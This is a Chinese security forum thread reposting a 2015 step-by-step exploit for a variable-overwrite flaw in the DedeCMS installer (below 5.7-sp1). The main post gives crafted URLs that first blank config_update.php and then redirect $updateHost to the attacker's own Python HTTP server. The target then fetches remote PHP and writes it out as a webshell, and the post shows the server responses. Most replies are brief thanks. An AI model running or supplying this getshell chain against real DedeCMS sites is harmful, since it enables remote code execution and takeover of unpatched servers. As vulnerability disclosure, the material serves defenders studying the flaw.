查看: 78456|回复: 168

DedeCMS < 5.7-sp1远程文件包含漏洞

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-7-6 12:33:08 | 显示全部楼层 |阅读模式
    Published: 2015-06-29
    [PHP] 纯文本查看 复制代码
    Remote getshell 
    Details:
    =======
    After the default installation of dedecms
    Installation directory
    /install/index.php
    or
    /install/index.php.bak
      
    /install/index.php //run iis apache exploit
    /install/index.php.bak //run apache exploit
     
     
    Code analysis
     
    /install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb
     
    #############################################################################
    17 $install_demo_name = 'dedev57demo.txt';
    18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
     
    here $install_demo_name and $insLockfile definition
    // echo $install_demo_name;  printf dedev57demo.txt 
     
    29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
    30 {
    31    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
    32 }
     
     
    // echo $install_demo_name; printf aaaa
     
    $install_demo_name by variable coverage
     
    The same
    17 $install_demo_name = 'dedev57demo.txt';
    18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
     
    variable coverage
    #############################################################################
     
     
     
      
    GETSHELL Step 1 Clear file contents config_update.php
    #############################################################################
    config_update.php
    13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
    14 $linkHost = 'http://flink.dedecms.com/server_url.php';
     
    In order to obtain the webshell need to control $updateHost
    So the use of variable coverags cleared config_update.php
     
      
    [url]http://192.168.204.135/install/index.php.bak[/url]
    ?step=11
    &insLockfile=a
    &s_lang=a
    &install_demo_name=../data/admin/config_update.php
     
    index.php.bak
    373 else if($step==11)
    374 {
    375 require_once('../data/admin/config_update.php');
    376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
    377 
    378 $sql_content = file_get_contents($rmurl);
    379 $fp = fopen($install_demo_name,'w');
    380 if(fwrite($fp,$sql_content))
    381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
    382 else
    383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
    384 unset($sql_content);
    385 fclose($fp);
    386 exit();
    387 }
     
    ###
    HTTP/1.1 200 OK
    Date: Wed, 17 Jun 2015 06:55:23 GMT
    Server: Apache/2.4.12
    X-Powered-By: PHP/5.6.6
    Vary: User-Agent
    Content-Length: 55
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
      
      <font color="red">[×]</font> 远程获取失败
     ###
     
     
     
     
    ###After execution file 0 byte ~ho~year~####
    2015/06/17  14:55                 0 config_update.php
                   1 file              0 byte
     
     
      
    GETSHELL Step 2
    #############################################################################
    Create local HTTP services
      
    zise:tmp zise$ ifconfig en0
    en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    inet 119.253.3.18 netmask 0xffffff00 broadcast  
      
    zise:tmp zise$ mkdir "dedecms"
    zise:tmp zise$ cd dedecms/
    zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt
    zise:dedecms zise$ cd ../
    zise:tmp zise$ python -m SimpleHTTPServer
    Serving HTTP on 0.0.0.0 port 8000 ...
    192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -
      
      
    ####
    [url]http://192.168.204.135/install/index.php.bak[/url]
    ?step=11
    &insLockfile=a
    &s_lang=a
    &install_demo_name=hello.php
    &updateHost=http://119.253.3.18:8000/
     
    ####
      
    HTTP/1.1 200 OK
    Date: Wed, 17 Jun 2015 07:11:18 GMT
    Server: Apache/2.4.12
    X-Powered-By: PHP/5.6.6
    Vary: Accept-Encoding,User-Agent
    Content-Length: 81
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
      
      <font color="green">[√]</font> 存在(您可以选择安装进行体验)
     
     
    index.php.bak
    373 else if($step==11)
    374 {
    375 require_once('../data/admin/config_update.php');
    376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
    377 
    378 $sql_content = file_get_contents($rmurl);
    379 $fp = fopen($install_demo_name,'w');
    380 if(fwrite($fp,$sql_content))  //fwrite websehll
    381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
    382 else
    383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
    384 unset($sql_content);
    385 fclose($fp);
    386 exit();
    387 }
      
    Attack complete
    you webshell
      
    [url]http://192.168.204.135/install/hello.php[/url]
     
     
     
    > zise ^_^
    > Security researcher
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-7-7 01:20:20 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-7 03:06:49 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-8 20:30:47 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-8 21:39:35 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-8 22:14:50 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-9 16:51:42 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-10 05:03:19 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-10 06:13:30 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-10 11:42:46 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 14:47 , Processed in 0.024627 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部